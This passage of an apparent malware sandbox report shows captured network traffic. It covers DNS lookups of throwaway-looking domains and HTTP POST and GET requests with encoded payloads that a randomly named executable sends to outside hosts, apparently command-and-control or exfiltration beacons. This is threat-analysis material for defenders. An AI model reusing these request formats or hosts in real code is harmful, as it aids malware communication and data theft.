Jan 16, 2025 09:24:59.959568977 CET	50023	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:59.959608078 CET	50023	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:59.978842020 CET	50023	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:59.983745098 CET	80	50023	199.59.243.228	192.168.2.4
Jan 16, 2025 09:25:05.007332087 CET	50024	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:05.012345076 CET	80	50024	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:05.012442112 CET	50024	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:05.029855013 CET	50024	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:05.034926891 CET	80	50024	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:05.903883934 CET	80	50024	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:05.904033899 CET	80	50024	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:05.904206991 CET	50024	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:05.915091991 CET	80	50024	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:05.915232897 CET	50024	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:06.534559011 CET	50024	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:07.553447008 CET	50025	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:07.558967113 CET	80	50025	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:07.559081078 CET	50025	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:07.573101997 CET	50025	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:07.578195095 CET	80	50025	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:08.795496941 CET	80	50025	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:08.795545101 CET	80	50025	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:08.795584917 CET	80	50025	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:08.795598030 CET	50025	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:08.795639992 CET	50025	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:09.081685066 CET	50025	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:10.100037098 CET	50026	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:10.104965925 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.105055094 CET	50026	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:10.122344971 CET	50026	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:10.127145052 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.127248049 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.127262115 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.127274036 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.127288103 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.127363920 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.127377033 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.127439976 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.127453089 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.891068935 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.891093016 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.891108990 CET	80	50026	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:10.891140938 CET	50026	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:10.891170025 CET	50026	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:11.629470110 CET	50026	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:12.648310900 CET	50027	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:12.653199911 CET	80	50027	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:12.653400898 CET	50027	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:12.664658070 CET	50027	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:12.669547081 CET	80	50027	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:13.527156115 CET	80	50027	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:13.527180910 CET	80	50027	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:13.527208090 CET	80	50027	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:13.527309895 CET	50027	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:13.529936075 CET	50027	80	192.168.2.4	68.65.122.71
Jan 16, 2025 09:25:13.534775019 CET	80	50027	68.65.122.71	192.168.2.4
Jan 16, 2025 09:25:18.561290026 CET	50028	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:18.566150904 CET	80	50028	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:18.571129084 CET	50028	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:18.586195946 CET	50028	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:18.591058969 CET	80	50028	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:19.152981043 CET	80	50028	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:19.153167963 CET	80	50028	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:19.153213024 CET	50028	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:20.097110987 CET	50028	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:21.117523909 CET	50029	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:21.125200033 CET	80	50029	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:21.125277996 CET	50029	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:21.150480032 CET	50029	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:21.157968044 CET	80	50029	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:21.705100060 CET	80	50029	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:21.705255032 CET	80	50029	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:21.705424070 CET	50029	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:22.659646988 CET	50029	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:23.678211927 CET	50030	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:23.683079958 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:23.683212996 CET	50030	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:23.699177027 CET	50030	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:23.704062939 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:23.704087019 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:23.704108953 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:23.704121113 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:23.704166889 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:23.704179049 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:23.704201937 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:23.704758883 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:23.704771042 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:24.298782110 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:24.298918962 CET	80	50030	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:24.299154997 CET	50030	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:25.206640005 CET	50030	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:26.225848913 CET	50031	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:26.230880976 CET	80	50031	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:26.231201887 CET	50031	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:26.240880966 CET	50031	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:26.245893955 CET	80	50031	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:26.835616112 CET	80	50031	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:26.835752964 CET	80	50031	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:26.835817099 CET	50031	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:26.838248968 CET	50031	80	192.168.2.4	209.74.64.189
Jan 16, 2025 09:25:26.843031883 CET	80	50031	209.74.64.189	192.168.2.4
Jan 16, 2025 09:25:32.325640917 CET	50032	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:32.330892086 CET	80	50032	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:32.330972910 CET	50032	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:32.345748901 CET	50032	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:32.350558996 CET	80	50032	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:33.280035019 CET	80	50032	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:33.280047894 CET	80	50032	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:33.280093908 CET	50032	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:33.280201912 CET	80	50032	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:33.280244112 CET	50032	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:33.847402096 CET	50032	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:34.866954088 CET	50033	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:34.871957064 CET	80	50033	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:34.875293970 CET	50033	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:34.897540092 CET	50033	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:34.903434038 CET	80	50033	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:35.816458941 CET	80	50033	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:35.816476107 CET	80	50033	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:35.816523075 CET	50033	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:35.816689014 CET	80	50033	160.25.166.123	192.168.2.4
Jan 16, 2025 09:25:35.816732883 CET	50033	80	192.168.2.4	160.25.166.123
Jan 16, 2025 09:25:36.816273928 CET	50033	80	192.168.2.4	160.25.166.123

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 09:23:43.334472895 CET	60162	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:23:43.346923113 CET	53	60162	1.1.1.1	192.168.2.4
Jan 16, 2025 09:23:59.022088051 CET	54409	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:23:59.040405035 CET	53	54409	1.1.1.1	192.168.2.4
Jan 16, 2025 09:24:13.177963972 CET	57549	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:24:14.190721035 CET	57549	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:24:15.190859079 CET	57549	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:24:15.518672943 CET	53	57549	1.1.1.1	192.168.2.4
Jan 16, 2025 09:24:15.518691063 CET	53	57549	1.1.1.1	192.168.2.4
Jan 16, 2025 09:24:15.518702984 CET	53	57549	1.1.1.1	192.168.2.4
Jan 16, 2025 09:24:29.101130009 CET	59396	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:24:29.114077091 CET	53	59396	1.1.1.1	192.168.2.4
Jan 16, 2025 09:24:43.693473101 CET	62099	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:24:43.703161955 CET	53	62099	1.1.1.1	192.168.2.4
Jan 16, 2025 09:24:51.756979942 CET	55650	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:24:51.820241928 CET	53	55650	1.1.1.1	192.168.2.4
Jan 16, 2025 09:25:04.991776943 CET	64404	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:25:05.004611969 CET	53	64404	1.1.1.1	192.168.2.4
Jan 16, 2025 09:25:18.537842035 CET	51741	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:25:18.556152105 CET	53	51741	1.1.1.1	192.168.2.4
Jan 16, 2025 09:25:31.851279974 CET	63035	53	192.168.2.4	1.1.1.1
Jan 16, 2025 09:25:32.323046923 CET	53	63035	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 09:23:43.334472895 CET	192.168.2.4	1.1.1.1	0x7def	Standard query (0)	www.littlecarseats.shop	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:23:59.022088051 CET	192.168.2.4	1.1.1.1	0x75a2	Standard query (0)	www.givvjn.info	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:13.177963972 CET	192.168.2.4	1.1.1.1	0xec39	Standard query (0)	www.oequ8s1l.vip	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:14.190721035 CET	192.168.2.4	1.1.1.1	0xec39	Standard query (0)	www.oequ8s1l.vip	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.190859079 CET	192.168.2.4	1.1.1.1	0xec39	Standard query (0)	www.oequ8s1l.vip	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:29.101130009 CET	192.168.2.4	1.1.1.1	0xedfb	Standard query (0)	www.lugao.xyz	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:43.693473101 CET	192.168.2.4	1.1.1.1	0x3b37	Standard query (0)	www.juiceem.shop	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:51.756979942 CET	192.168.2.4	1.1.1.1	0x990c	Standard query (0)	www.activeusers.tech	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:25:04.991776943 CET	192.168.2.4	1.1.1.1	0x8c82	Standard query (0)	www.rtp189z.lat	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:25:18.537842035 CET	192.168.2.4	1.1.1.1	0xc70b	Standard query (0)	www.boldjourn.website	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:25:31.851279974 CET	192.168.2.4	1.1.1.1	0xed15	Standard query (0)	www.rpa.asia	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 09:23:43.346923113 CET	1.1.1.1	192.168.2.4	0x7def	No error (0)	www.littlecarseats.shop		104.21.83.145	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:23:43.346923113 CET	1.1.1.1	192.168.2.4	0x7def	No error (0)	www.littlecarseats.shop		172.67.177.113	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:23:59.040405035 CET	1.1.1.1	192.168.2.4	0x75a2	No error (0)	www.givvjn.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518672943 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	www.oequ8s1l.vip	2xieerbi.dun899.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518672943 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.93	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518672943 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.88	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518672943 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.82	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518672943 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.67	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518691063 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	www.oequ8s1l.vip	2xieerbi.dun899.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518691063 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.93	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518691063 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.88	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518691063 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.82	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518691063 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.67	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518702984 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	www.oequ8s1l.vip	2xieerbi.dun899.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518702984 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.93	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518702984 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.88	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518702984 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.82	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:15.518702984 CET	1.1.1.1	192.168.2.4	0xec39	No error (0)	2xieerbi.dun899.com		149.104.185.67	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:29.114077091 CET	1.1.1.1	192.168.2.4	0xedfb	No error (0)	www.lugao.xyz		172.67.147.28	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:29.114077091 CET	1.1.1.1	192.168.2.4	0xedfb	No error (0)	www.lugao.xyz		104.21.79.189	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:43.703161955 CET	1.1.1.1	192.168.2.4	0x3b37	Name error (3)	www.juiceem.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:24:51.820241928 CET	1.1.1.1	192.168.2.4	0x990c	No error (0)	www.activeusers.tech		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:25:05.004611969 CET	1.1.1.1	192.168.2.4	0x8c82	No error (0)	www.rtp189z.lat	rtp189z.lat		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 09:25:05.004611969 CET	1.1.1.1	192.168.2.4	0x8c82	No error (0)	rtp189z.lat		68.65.122.71	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:25:18.556152105 CET	1.1.1.1	192.168.2.4	0xc70b	No error (0)	www.boldjourn.website		209.74.64.189	A (IP address)	IN (0x0001)	false
Jan 16, 2025 09:25:32.323046923 CET	1.1.1.1	192.168.2.4	0xed15	No error (0)	www.rpa.asia		160.25.166.123	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.littlecarseats.shop

www.givvjn.info

www.oequ8s1l.vip

www.lugao.xyz

www.activeusers.tech

www.rtp189z.lat

www.boldjourn.website

www.rpa.asia

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49838	104.21.83.145	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:23:43.368726015 CET	488	OUT	GET /vngz/?BXc8V=BywAvqZrlXCPypxowigGU/RMQqJ+aFEu4r9fzmpnpak2vS64kVBA8ZUuc20d6AYdHHbV7T9IEXhUPkXJmH12l+9kSAAe2W5CHPw/a2fo9vOL4zfBkwpEEo8=&f898=D4YHodiH3rXTfZ HTTP/1.1 Host: www.littlecarseats.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Jan 16, 2025 09:23:43.980401039 CET	1088	IN	HTTP/1.1 403 Forbidden Date: Thu, 16 Jan 2025 08:23:43 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4MbgDQZo0FIce232XVSZKN9ZiyI6K4%2BxE9pi7SVT7LknH9vcrR2WYrCmwtGNl4oDkW%2BURt%2B5Z7hxbI8DjH3Ih%2FLoqOwjo9WwHlLKHwmdBTGHI6fZOhXtY6FyUT8gBkw81JkroKYCP1AkGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902cb48298863b41-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7098&min_rtt=7098&rtt_var=3549&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 74 74 6c 65 63 61 72 73 65 61 74 73 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 110<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache Server at www.littlecarseats.shop Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49939	47.83.1.90	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:23:59.060910940 CET	738	OUT	POST /e4zw/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Connection: close Origin: http://www.givvjn.info Referer: http://www.givvjn.info/e4zw/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 69 44 39 65 52 4a 70 54 68 35 43 4f 33 74 54 57 38 44 74 58 54 6c 6f 4d 71 45 47 38 61 41 6d 6a 55 2b 65 68 4b 69 30 68 2b 53 49 56 30 48 49 6f 6f 32 6b 4b 68 48 2b 50 4b 2f 43 39 43 53 6f 6e 66 70 32 69 46 6b 71 6f 5a 66 58 6e 4f 56 34 45 31 30 52 75 36 37 58 2f 6f 4b 45 77 68 34 71 6d 36 52 59 43 47 76 7a 63 70 4a 6a 2b 72 68 54 6b 62 2f 53 71 46 67 43 55 4f 52 2f 37 43 2b 48 36 73 46 37 71 48 5a 58 77 6c 65 69 4f 2b 6a 68 41 4c 45 76 6a 37 56 70 74 5a 2f 49 56 30 58 73 4a 58 67 45 65 58 41 79 33 52 42 6f 53 34 67 77 65 6c 6d 79 61 48 4f 6c 63 7a 42 56 56 6d 47 45 31 6c 67 3d 3d Data Ascii: BXc8V=iD9eRJpTh5CO3tTW8DtXTloMqEG8aAmjU+ehKi0h+SIV0HIoo2kKhH+PK/C9CSonfp2iFkqoZfXnOV4E10Ru67X/oKEwh4qm6RYCGvzcpJj+rhTkb/SqFgCUOR/7C+H6sF7qHZXwleiO+jhALEvj7VptZ/IV0XsJXgEeXAy3RBoS4gwelmyaHOlczBVVmGE1lg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49956	47.83.1.90	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:01.604327917 CET	758	OUT	POST /e4zw/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Connection: close Origin: http://www.givvjn.info Referer: http://www.givvjn.info/e4zw/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 69 44 39 65 52 4a 70 54 68 35 43 4f 34 74 44 57 2b 6a 52 58 55 46 6f 4e 76 45 47 38 44 51 6d 6e 55 2b 53 68 4b 67 45 78 2f 67 63 56 33 69 73 6f 6d 55 4d 4b 6d 48 2b 50 42 66 44 31 66 69 6f 38 66 70 7a 56 46 6b 57 6f 5a 66 7a 6e 4f 52 38 45 31 44 74 74 37 72 58 39 6b 71 45 49 6c 34 71 6d 36 52 59 43 47 76 58 69 70 4e 33 2b 72 51 6a 6b 64 75 53 72 62 77 43 54 66 52 2f 37 49 65 48 2b 73 46 37 63 48 59 62 61 6c 63 71 4f 2b 6e 78 41 49 51 7a 67 69 46 70 6e 64 2f 4a 2b 79 30 56 4e 51 51 4a 64 64 51 61 31 51 69 67 6c 77 47 39 45 30 58 54 4e 56 4f 42 76 75 47 63 68 72 46 35 38 2b 6d 69 47 71 36 64 37 52 77 69 6d 51 44 2b 57 42 33 79 31 2b 70 59 3d Data Ascii: BXc8V=iD9eRJpTh5CO4tDW+jRXUFoNvEG8DQmnU+ShKgEx/gcV3isomUMKmH+PBfD1fio8fpzVFkWoZfznOR8E1Dtt7rX9kqEIl4qm6RYCGvXipN3+rQjkduSrbwCTfR/7IeH+sF7cHYbalcqO+nxAIQzgiFpnd/J+y0VNQQJddQa1QiglwG9E0XTNVOBvuGchrF58+miGq6d7RwimQD+WB3y1+pY=
Jan 16, 2025 09:24:03.041660070 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 16 Jan 2025 08:24:02 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49976	47.83.1.90	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:04.154341936 CET	10840	OUT	POST /e4zw/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Connection: close Origin: http://www.givvjn.info Referer: http://www.givvjn.info/e4zw/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 69 44 39 65 52 4a 70 54 68 35 43 4f 34 74 44 57 2b 6a 52 58 55 46 6f 4e 76 45 47 38 44 51 6d 6e 55 2b 53 68 4b 67 45 78 2f 68 6b 56 33 55 67 6f 70 56 4d 4b 6e 48 2b 50 43 66 44 32 66 69 6f 78 66 74 66 52 46 6b 61 53 5a 64 37 6e 4f 79 6b 45 7a 33 35 74 31 72 58 39 35 61 45 7a 68 34 71 7a 36 56 38 4f 47 76 6e 69 70 4e 33 2b 72 54 37 6b 4d 2f 53 72 5a 77 43 55 4f 52 2f 6e 43 2b 48 43 73 46 6a 69 48 59 50 67 